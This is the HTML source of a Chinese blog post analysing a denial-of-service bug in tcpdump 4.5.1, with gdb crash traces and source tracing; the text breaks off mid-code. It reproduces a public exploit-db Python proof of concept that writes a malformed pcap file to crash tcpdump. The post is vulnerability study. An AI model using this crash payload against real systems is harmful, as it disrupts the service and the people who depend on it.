<!DOCTYPE html>
< html class = "theme-next gemini use-motion" lang = "zh-Hans" >
< head > < meta name = "generator" content = "Hexo 3.8.0" >
< meta charset = "UTF-8" >
< meta http-equiv = "X-UA-Compatible" content = "IE=edge" >
< meta name = "viewport" content = "width=device-width, initial-scale=1, maximum-scale=1" >
< meta name = "theme-color" content = "#222" >
< meta http-equiv = "Cache-Control" content = "no-transform" >
< meta http-equiv = "Cache-Control" content = "no-siteapp" >
< link href = "/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel = "stylesheet" type = "text/css" >
< link href = "/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel = "stylesheet" type = "text/css" >
< link href = "/css/main.css?v=5.1.4" rel = "stylesheet" type = "text/css" >
< link rel = "apple-touch-icon" sizes = "180x180" href = "/images/apple-touch-icon-next.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "32x32" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "16x16" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "mask-icon" href = "/images/logo.svg?v=5.1.4" color = "#222" >
< meta name = "keywords" content = "TCPDUMP,拒绝服务攻击," >
< meta name = "description" content = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统: 包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中, tcpdump 需要使用libpcap这个捕捉数" >
< meta name = "keywords" content = "TCPDUMP,拒绝服务攻击" >
< meta property = "og:type" content = "article" >
< meta property = "og:title" content = "TCPDUMP拒绝服务攻击漏洞" >
< meta property = "og:url" content = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html" >
< meta property = "og:site_name" content = "混元霹雳手" >
< meta property = "og:description" content = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统: 包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中, tcpdump 需要使用libpcap这个捕捉数" >
< meta property = "og:locale" content = "zh-Hans" >
< meta property = "og:updated_time" content = "2019-03-23T04:41:58.890Z" >
< meta name = "twitter:card" content = "summary" >
< meta name = "twitter:title" content = "TCPDUMP拒绝服务攻击漏洞" >
< meta name = "twitter:description" content = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统: 包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中, tcpdump 需要使用libpcap这个捕捉数" >
< script type = "text/javascript" id = "hexo.configurations" >
var NexT = window.NexT || {};
// Theme configuration object for this page build (Hexo 3.8.0 / NexT 5.1.4,
// matching the generator meta and asset query strings in the <head>).
// Presumably read by the theme scripts loaded further down the page — those
// are outside this block, so the exact consumers are not verified here.
var CONFIG = {};
CONFIG.root = '/';
CONFIG.scheme = 'Gemini';
CONFIG.version = '5.1.4';
// Sidebar placement/behaviour flags, kept as the literal the build emitted.
CONFIG.sidebar = {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false};
CONFIG.fancybox = true;
CONFIG.tabs = true;
// Animation settings: which transition each page region uses.
CONFIG.motion = {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}};
// Duoshuo comment-service identity for this site.
CONFIG.duoshuo = {
  userId: '0',
  author: '博主'
};
// Algolia search settings. The application id, API key and index name are all
// empty in this build, so no Algolia credential is exposed by this page.
CONFIG.algolia = {
  applicationID: '',
  apiKey: '',
  indexName: '',
  hits: {"per_page":10},
  labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
};
< / script >
< link rel = "canonical" href = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" >
< title > TCPDUMP拒绝服务攻击漏洞 | 混元霹雳手< / title >
< / head >
< body itemscope itemtype = "http://schema.org/WebPage" lang = "zh-Hans" >
< div class = "container sidebar-position-left page-post-detail" >
< div class = "headband" > < / div >
< header id = "header" class = "header" itemscope itemtype = "http://schema.org/WPHeader" >
< div class = "header-inner" > < div class = "site-brand-wrapper" >
< div class = "site-meta " >
< div class = "custom-logo-site-title" >
< a href = "/" class = "brand" rel = "start" >
< span class = "logo-line-before" > < i > < / i > < / span >
< span class = "site-title" > 混元霹雳手< / span >
< span class = "logo-line-after" > < i > < / i > < / span >
< / a >
< / div >
< p class = "site-subtitle" > < / p >
< / div >
< / div >
< / div >
< / header >
< main id = "main" class = "main" >
< div class = "main-inner" >
< div class = "content-wrap" >
< div id = "content" class = "content" >
< div id = "posts" class = "posts-expand" >
< article class = "post post-type-normal" itemscope itemtype = "http://schema.org/Article" >
< div class = "post-block" >
< link itemprop = "mainEntityOfPage" href = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" >
< span hidden itemprop = "author" itemscope itemtype = "http://schema.org/Person" >
< meta itemprop = "name" content = "Cool-Y" >
< meta itemprop = "description" content >
< meta itemprop = "image" content = "/images/avatar.png" >
< / span >
< span hidden itemprop = "publisher" itemscope itemtype = "http://schema.org/Organization" >
< meta itemprop = "name" content = "混元霹雳手" >
< / span >
< header class = "post-header" >
< h1 class = "post-title" itemprop = "name headline" > TCPDUMP拒绝服务攻击漏洞< / h1 >
< div class = "post-meta" >
< span class = "post-time" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-calendar-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 发表于< / span >
< time title = "创建于" itemprop = "dateCreated datePublished" datetime = "2018-12-25T12:26:05+08:00" >
2018-12-25
< / time >
< / span >
< span class = "post-category" >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-folder-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 分类于< / span >
< span itemprop = "about" itemscope itemtype = "http://schema.org/Thing" >
< a href = "/categories/二进制漏洞/" itemprop = "url" rel = "index" >
< span itemprop = "name" > 二进制漏洞< / span >
< / a >
< / span >
< / span >
< div class = "post-wordcount" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-file-word-o" > < / i >
< / span >
< span title = "字数统计" >
3.4k 字
< / span >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-clock-o" > < / i >
< / span >
< span title = "阅读时长" >
16 分钟
< / span >
< / div >
< / div >
< / header >
< div class = "post-body" itemprop = "articleBody" >
< h1 id = "TCPDUMP-4-5-1-拒绝服务攻击漏洞分析" > < a href = "#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析" class = "headerlink" title = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析" > < / a > TCPDUMP 4.5.1 拒绝服务攻击漏洞分析< / h1 > < h2 id = "一、Tcpdump介绍" > < a href = "#一、Tcpdump介绍" class = "headerlink" title = "一、Tcpdump介绍" > < / a > 一、Tcpdump介绍< / h2 > < ol >
< li > tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统: 包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中, tcpdump 需要使用libpcap这个捕捉数据的库。其在Windows下的版本称为WinDump; 它需要WinPcap驱动, 相当于在Linux平台下的libpcap.< / li >
< li > tcpdump能够分析网络行为, 性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤, 并提供and、or、not等逻辑语句来帮助你去掉无用的信息, 从而使用户能够进一步找出问题的根源。< / li >
< li > 也可以使用 tcpdump 的实现特定目的,例如在路由器和网关之间拦截并显示其他用户或计算机通信。通过 tcpdump 分析非加密的流量, 如Telnet或HTTP的数据包, 查看登录的用户名、密码、网址、正在浏览的网站内容, 或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁, 而是对网络上的其他计算机的安全存在威胁。< / li >
< / ol >
< h2 id = "二、分析环境" > < a href = "#二、分析环境" class = "headerlink" title = "二、分析环境" > < / a > 二、分析环境< / h2 > < ul >
< li > Ubuntu 16.04.4 LTS i686< / li >
< li > tcpdump 4.5.1< / li >
< li > gdb with peda< / li >
< / ul >
< h2 id = "三、漏洞复现" > < a href = "#三、漏洞复现" class = "headerlink" title = "三、漏洞复现" > < / a > 三、漏洞复现< / h2 > < p > 这个漏洞触发的原因是, tcpdump在处理特殊的pcap包的时候, 由于对数据包传输数据长度没有进行严格的控制, 导致在连续读取数据包中内容超过一定长度后, 会读取到无效的内存空间, 从而导致拒绝服务的发生。对于这个漏洞, 首先要对pcap包的结构进行一定的分析, 才能够最后分析出漏洞的成因, 下面对这个漏洞进行复现。< / p >
< h3 id = "1-编译安装tcpdump" > < a href = "#1-编译安装tcpdump" class = "headerlink" title = "1.编译安装tcpdump" > < / a > 1.编译安装tcpdump< / h3 > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. # apt-get install libpcap-dev< / span > < br > < span class = "line" > 2. # dpkg -l libpcap-dev< / span > < br > < span class = "line" > 3. # wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz< / span > < br > < span class = "line" > 4. # tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz< / span > < br > < span class = "line" > 5. # cd tcpdump-4.5.1/< / span > < br > < span class = "line" > 6. # ./configure< / span > < br > < span class = "line" > 7. # make< / span > < br > < span class = "line" > 8. # make install< / span > < br > < span class = "line" > 9. # tcpdump --version< / span > < br > < span class = "line" > tcpdump version 4.5.1< / span > < br > < span class = "line" > libpcap version 1.7.4< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< h3 id = "2-生成payload( 来自exploit-db-payload) " > < a href = "#2-生成payload( 来自exploit-db-payload) " class = "headerlink" title = "2.生成payload( 来自exploit-db payload) " > < / a > 2.生成payload( 来自exploit-db payload) < / h3 > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > # Exploit Title: tcpdump 4.5.1 Access Violation Crash< / span > < br > < span class = "line" > # Date: 31st May 2016< / span > < br 
> < span class = "line" > # Exploit Author: David Silveiro< / span > < br > < span class = "line" > # Vendor Homepage: http://www.tcpdump.org< / span > < br > < span class = "line" > # Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz< / span > < br > < span class = "line" > # Version: 4.5.1< / span > < br > < span class = "line" > # Tested on: Ubuntu 14 LTS< / span > < br > < span class = "line" > from subprocess import call< / span > < br > < span class = "line" > from shlex import split< / span > < br > < span class = "line" > from time import sleep< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > def crash():< / span > < br > < span class = "line" > command = ' tcpdump -r crash' < / span > < br > < span class = "line" > buffer = ' \xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff' < / span > < br > < span class = "line" > buffer += ' \x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00' < / span > < br > < span class = "line" > buffer += ' \x00\x00\x00\x00\x00\x08\x00\x00\x00\x00< \x9c7@\xff\x00' < / span > < br > < span class = "line" > buffer += ' \x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a' < / span > < br > < span class = "line" > buffer += " \x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0& \x80\x18\' " < / span > < br > < span class = "line" > buffer += " xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n' , ' \x00\x00\x00\x00" < / span > < br > < span class = "line" > buffer += ' \x00\x00\x00\x00\x01\x03\x03\x04' < / span > < br > < span class = "line" > with open(' crash' , ' w+b' ) as file:< / span > < br > < span class = "line" > file.write(buffer)< / span > < br > < span class = "line" > try:< / span > < br > < span class = "line" > call(split(command))< / span > < br > < span class = "line" > print(" Exploit successful! " )< / span > < br > < span class = "line" > except:< / span > < br > < span class = "line" > print(" Error: Something has gone wrong!" 
)< / span > < br > < span class = "line" > def main():< / span > < br > < span class = "line" > print(" Author: David Silveiro " )< / span > < br > < span class = "line" > print(" tcpdump version 4.5.1 Access Violation Crash " )< / span > < br > < span class = "line" > sleep(2)< / span > < br > < span class = "line" > crash()< / span > < br > < span class = "line" > if __name__ == " __main__" :< / span > < br > < span class = "line" > main()< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< h2 id = "四、崩溃分析" > < a href = "#四、崩溃分析" class = "headerlink" title = "四、崩溃分析" > < / a > 四、崩溃分析< / h2 > < h3 id = "1-pcap包格式" > < a href = "#1-pcap包格式" class = "headerlink" title = "1.pcap包格式" > < / a > 1.pcap包格式< / h3 > < p > 首先来分析一下pcap包的格式, 首先是pcap文件头的内容, 在.h有所定义, 这里将结构体以及对应变量含义都列出来。< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > struct pcap_file_header { < / span > < br > < span class = "line" > bpf_u_int32 magic;< / span > < br > < span class = "line" > u_short version_major;< / span > < br > < span class = "line" > u_short version_minor;< / span > < br > < span class = "line" > bpf_int32 thiszone; /* gmt to local correction */< / span > < br > < span class = "line" > bpf_u_int32 sigfigs; /* accuracy of timestamps */< / span > < br > < span class = "line" > bpf_u_int32 snaplen; /* max length saved portion of each pkt */< / span > < br > < span class = "line" > bpf_u_int32 linktype; /* data link type (LINKTYPE_*) */< / span > < br > < span class = "line" > } ;< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 看一下各字段的含义:< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > magic: 4字节 pcap文件标识 目前为“d4 c3 b2 a1”< / span > < br > < span class = "line" > major: 2字节 主版本号 #define PCAP_VERSION_MAJOR 2< / span > < br > < span class = "line" > minor: 2字节 次版本号 #define PCAP_VERSION_MINOR 4< / span > < br > < span class = "line" > thiszone: 4字节 时区修正 并未使用, 目前全为0< / span > < br > < span class = "line" > sigfigs: 4字节 精确时间戳 并未使用, 目前全为0< / span > < br > < span class = "line" > snaplen: 4字节 抓包最大长度 如果要抓全, 设为0x0000ffff( 65535) , < / span > < br > < span class = "line" > tcpdump -s 0就是设置这个参数, 缺省为68字节< / span > < br > < span class = "line" > linktype: 4字节 链路类型 一般都是1: ethernet< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > struct pcap_pkthdr { < / span > < br > < span class = "line" > struct timeval ts; /* time stamp */< / span > < br > < span class = "line" > bpf_u_int32 caplen; /* length of portion present */< / span > < br > < span class = 
"line" > bpf_u_int32 len; /* length this packet (off wire) */< / span > < br > < span class = "line" > } ;< / span > < br > < span class = "line" > struct timeval { < / span > < br > < span class = "line" > long tv_sec; /* seconds (XXX should be time_t) */< / span > < br > < span class = "line" > suseconds_t tv_usec; /* and microseconds */< / span > < br > < span class = "line" > } ;< / span > < br > < span class = "line" > ts: 8字节 抓包时间 4字节表示秒数, 4字节表示微秒数< / span > < br > < span class = "line" > caplen: 4字节 保存下来的包长度( 最多是snaplen, 比如68字节) < / span > < br > < span class = "line" > len: 4字节 数据包的真实长度, 如果文件中保存的不是完整数据包, 可能比caplen大< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 其中len变量是值得关注的, 因为在crash文件中, 对应len变量的值为00 3C 9C 37< br > 这是一个很大的值, 读取出来就是379C3C00, 数非常大, 实际上在wireshark中打开这个crash文件, 就会报错, 会提示这个数据包的长度已经超过了范围, 而换算出来的长度就是379C3C00, 这是触发漏洞的关键。< / p >
< h3 id = "2-gdb调试" > < a href = "#2-gdb调试" class = "headerlink" title = "2.gdb调试" > < / a > 2.gdb调试< / h3 > < p > 首先通过gdb运行tcpdump, 用-r参数打开poc生成的crash, tcp崩溃, 到达漏洞触发位置< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. 
Program received signal SIGSEGV, Segmentation fault.< / span > < br > < span class = "line" > 2. [----------------------------------registers-----------------------------------]< / span > < br > < span class = "line" > 3. EAX: 0x1< / span > < br > < span class = "line" > 4. EBX: 0x81e33bd --> 0x0< / span > < br > < span class = "line" > 5. ECX: 0x2e (' .' )< / span > < br > < span class = "line" > 6. EDX: 0x0< / span > < br > < span class = "line" > 7. ESI: 0xbfffe201 (' .' < repeats 14 times> )< / span > < br > < span class = "line" > 8. EDI: 0xbfffe1db --> 0x30303000 (' ' )< / span > < br > < span class = "line" > 9. EBP: 0x10621< / span > < br > < span class = "line" > 10. ESP: 0xbfffe1ac --> 0x8053caa (< hex_and_ascii_print_with_offset+170> : mov ecx,DWORD PTR [esp+0xc])< / span > < br > < span class = "line" > 11. EIP: 0x8053c6a (< hex_and_ascii_print_with_offset+106> : movzx edx,BYTE PTR [ebx+ebp*2+0x1])< / span > < br > < span class = "line" > 12. EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)< / span > < br > < span class = "line" > 13. [-------------------------------------code-------------------------------------]< / span > < br > < span class = "line" > 14. 0x8053c5d < hex_and_ascii_print_with_offset+93> : je 0x8053d40 < hex_and_ascii_print_with_offset+320> < / span > < br > < span class = "line" > 15. 0x8053c63 < hex_and_ascii_print_with_offset+99> : mov ebx,DWORD PTR [esp+0x18]< / span > < br > < span class = "line" > 16. 0x8053c67 < hex_and_ascii_print_with_offset+103> : sub esp,0x4< / span > < br > < span class = "line" > 17. => 0x8053c6a < hex_and_ascii_print_with_offset+106> : movzx edx,BYTE PTR [ebx+ebp*2+0x1]< / span > < br > < span class = "line" > 18. 0x8053c6f < hex_and_ascii_print_with_offset+111> : movzx ecx,BYTE PTR [ebx+ebp*2]< / span > < br > < span class = "line" > 19. 0x8053c73 < hex_and_ascii_print_with_offset+115> : push edx< / span > < br > < span class = "line" > 20. 
0x8053c74 < hex_and_ascii_print_with_offset+116> : mov ebx,edx< / span > < br > < span class = "line" > 21. 0x8053c76 < hex_and_ascii_print_with_offset+118> : mov DWORD PTR [esp+0x18],edx< / span > < br > < span class = "line" > 22. [------------------------------------stack-------------------------------------]< / span > < br > < span class = "line" > 23. 0000| 0xbfffe1ac --> 0x8053caa (< hex_and_ascii_print_with_offset+170> : mov ecx,DWORD PTR [esp+0xc])< / span > < br > < span class = "line" > 24. 0004| 0xbfffe1b0 --> 0xb7fff000 --> 0x23f3c< / span > < br > < span class = "line" > 25. 0008| 0xbfffe1b4 --> 0x1< / span > < br > < span class = "line" > 26. 0012| 0xbfffe1b8 --> 0x2f5967 (' gY/' )< / span > < br > < span class = "line" > 27. 0016| 0xbfff
< p > 从崩溃信息来看, 出错位置为s2 = *cp++;崩溃原因为SIGSEGV, 即进程执行了一段无效的内存引用或发生段错误。可以看到, 问题出现在./print-ascii.c:91, 而且此时指针读取[ebx+ebp*2+0x1]的内容,可能是越界读取造成的崩溃。< br > 再结合源码信息可知, 指针cp在自加的过程中访问到了一个没有权限访问的地址, 因为这是写在一个while循环里, 也就是说nshorts的值偏大, 再看nshorts怎么来的, 由此nshorts = length / sizeof(u_short);可知, 可能是函数传入的参数length没有控制大小导致, 因此目标就是追踪length是如何传入的。< br > 我们通过bt回溯一下调用情况。< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. gdb-peda$ bt< / span > < br > < span class = "line" > 2. #0 hex_and_ascii_print_with_offset (ident=0x80c04af " \n\t" , cp=0x8204000 < error: Cannot access memory at address 0x8204000> ,< / span > < br > < span class = "line" > 3. length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91< / span > < br > < span class = "line" > 4. #1 0x08053e26 in hex_and_ascii_print (ident=0x80c04af " \n\t" , cp=0x81e33bd " " , length=0xfffffff3) at ./print-ascii.c:127< / span > < br > < span class = "line" > 5. #2 0x08051e7d in ieee802_15_4_if_print (ndo=0x81e1320 < Gndo> , h=0xbfffe40c, p=< optimized out> ) at ./print-802_15_4.c:180< / span > < br > < span class = "line" > 6. #3 0x080a0aea in print_packet (user=0xbfffe4dc " \023\036\b\300\034\005\b\001" , h=0xbfffe40c, sp=0x81e33a8 " @\377" )< / span > < br > < span class = "line" > 7. at ./tcpdump.c:1950< / span > < br > < span class = "line" > 8. 
#4 0xb7fa3468 in ?? () from /usr/lib/i386-linux-gnu/libpcap.so.0.8< / span > < br > < span class = "line" > 9. #5 0xb7f940e3 in pcap_loop () from /usr/lib/i386-linux-gnu/libpcap.so.0.8< / span > < br > < span class = "line" > 10. #6 0x0804b3dd in main (argc=0x3, argv=0xbffff6c4) at ./tcpdump.c:1569< / span > < br > < span class = "line" > 11. #7 0xb7de9637 in __libc_start_main (main=0x804a4c0 < main> , argc=0x3, argv=0xbffff6c4, init=0x80b1230 < __libc_csu_init> ,< / span > < br > < span class = "line" > 12. fini=0x80b1290 < __libc_csu_fini> , rtld_fini=0xb7fea880 < _dl_fini> , stack_end=0xbffff6bc) at ../csu/libc-start.c:291< / span > < br > < span class = "line" > 13. #8 0x0804c245 in _start ()< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 函数调用流程< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > pcap_loop< / span > < br > < span class = "line" > |----print_packet< / span > < br > < span class = "line" > |-----hex_and_ascii_print< / span > < br > < span class = "line" > |-------- hex_and_ascii_print_with_offset< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 由此可见, 从main函数开始了一连串函数调用, git源码下来看看。< br > tcpdump.c找到pcap_loop调用< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. do { < / span > < br > < span class = "line" > 2. status = pcap_loop(pd, cnt, callback, pcap_userdata);< / span > < br > < span class = "line" > 3. if (WFileName == NULL) { < / span > < br > < span class = "line" > 4. /*< / span > < br > < span class = "line" > 5. * We' re printing packets. Flush the printed output,< / span > < br > < span class = "line" > 6. * so it doesn' t get intermingled with error output.< / span > < br > < span class = "line" > 7. */< / span > < br > < span class = "line" > 8. if (status == -2) { < / span > < br > < span class = "line" > 9. /*< / span > < br > < span class = "line" > 10. * We got interrupted, so perhaps we didn' t< / span > < br > < span class = "line" > 11. * manage to finish a line we were printing.< / span > < br > < span class = "line" > 12. * Print an extra newline, just in case.< / span > < br > < span class = "line" > 13. */< / span > < br > < span class = "line" > 14. putchar(' n' );< / span > < br > < span class = "line" > 15. 
} < / span > < br > < span class = "line" > 16. (void)fflush(stdout);< / span > < br > < span class = "line" > 17. } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 设置断点之后查看一下该函数的执行结果< / p >
< p > pcap_loop通过callback指向print_packet,来看一下它的源码< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. static void< / span > < br > < span class = "line" > 2. print_packet(u_char *user, const struct pcap_pkthdr *h, const u_char *sp)< / span > < br > < span class = "line" > 3. { < / span > < br > < span class = "line" > 4. struct print_info *print_info;< / span > < br > < span class = "line" > 5. u_int hdrlen;< / span > < br > < span class = "line" > 6. ++packets_captured;< / span > < br > < span class = "line" > 7. ++infodelay;< / span > < br > < span class = "line" > 8. ts_print(& 